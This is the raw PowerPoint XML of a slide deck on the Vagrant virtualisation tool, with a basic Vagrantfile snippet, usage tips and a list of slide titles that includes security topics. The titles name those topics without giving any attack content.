                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>|conig|</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1986914" indent="92075">
              <a:lnSpc>
                <a:spcPts val="1360"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”ubuntu/trusty64”  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>end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ts val="1300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2” stands for the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant-version.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="125499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="690"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-125" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Usually </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>contains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lot </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>comments. Using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-flag will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>create  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>minimal version </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>containing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>only the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>important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spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>entries.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4351146" y="3169516"/>
            <a:ext cx="148589" cy="1143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590" y="190436"/>
            <a:ext cx="1360170" cy="716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95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-145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sz="1200" spc="-204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1200" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>BASICS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110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Terminology </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Workflow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3619" y="797596"/>
            <a:ext cx="3120555" cy="2274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8589" y="2932737"/>
            <a:ext cx="4069715" cy="3016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900" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Remember: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Almost </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant-commands </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are executed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the context </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>current working  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>directory.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546" y="3160549"/>
            <a:ext cx="977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"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>14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4063</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>657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</vt:lpstr>
      <vt:lpstr>Aroania</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>DejaVu Sans Mono</vt:lpstr>
      <vt:lpstr>LM Roman 10</vt:lpstr>
      <vt:lpstr>LM Roman 6</vt:lpstr>
      <vt:lpstr>LM Roman 9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THE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EXAMPLE</vt:lpstr>
      <vt:lpstr>THE EXAMPLE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE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INTERNALS : NETWORK</vt:lpstr>
      <vt:lpstr>THE INTERNALS : NETWORK</vt:lpstr>
      <vt:lpstr>THE INTERNALS : NETWORK</vt:lpstr>
      <vt:lpstr>THE INTERNALS : VAGRANT SSH</vt:lpstr>
      <vt:lpstr>THE INTERNALS : VAGRANT SSH</vt:lpstr>
      <vt:lpstr>THE INTERNALS : VAGRANT SSH</vt:lpstr>
      <vt:lpstr>THE INTERNALS : VAGRANT SSH</vt:lpstr>
      <vt:lpstr>THE INTERNALS : VAGRANT SSH</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE SECURITY : VAGRANT INIT</vt:lpstr>
      <vt:lpstr>THE SECURITY : VAGRANT INIT</vt:lpstr>
      <vt:lpstr>THE SECURITY : VAGRANT INIT</vt:lpstr>
      <vt:lpstr>THE SECURITY : VAGRANT INIT</vt:lpstr>
      <vt:lpstr>THE SECURITY : VAGRANT INIT</vt:lpstr>
      <vt:lpstr>THE SECURITY : PASSWORDS</vt:lpstr>
      <vt:lpstr>THE SECURITY : PASSWORDS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SECURITY : NETWORK</vt:lpstr>
      <vt:lpstr>THE SECURITY : SHARED FOLDERS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE SECURITY : DEFAULTS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>THE SECURITY : EXPLOITATION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Vagrant - Up and Running</dc:title>
  <cp:lastModifiedBy>Krishna Murthy P</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-17T03:10:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-17T04:17:18Z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2016-11-03T00:00:00Z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2020-12-17T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>